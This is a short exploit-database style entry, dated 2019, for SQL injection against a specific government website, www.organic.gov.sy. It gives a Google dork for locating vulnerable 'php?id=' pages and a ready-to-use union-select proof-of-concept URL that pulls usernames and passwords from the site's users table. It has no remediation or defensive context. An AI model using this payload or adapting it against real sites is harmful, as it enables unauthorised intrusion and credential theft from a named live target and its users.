#Exploit Title : www.organic.gov.sy SQL Injection
#Google Dork : site:www.organic.gov.sy inurl:php?id=
#Date : 2019/5/23
#Exploit Author : AmirAli Sadeghi Tamiz
#Tested on : win10
#Demo :
#POC
www.organic.gov.sy/data.php?id=-15%20union%20select%201,2,group_concat(NAME,0x3a,PASS,0x3c62723e),4,5,6+from+users
#discover by : AmirAli Sadeghi Tamiz
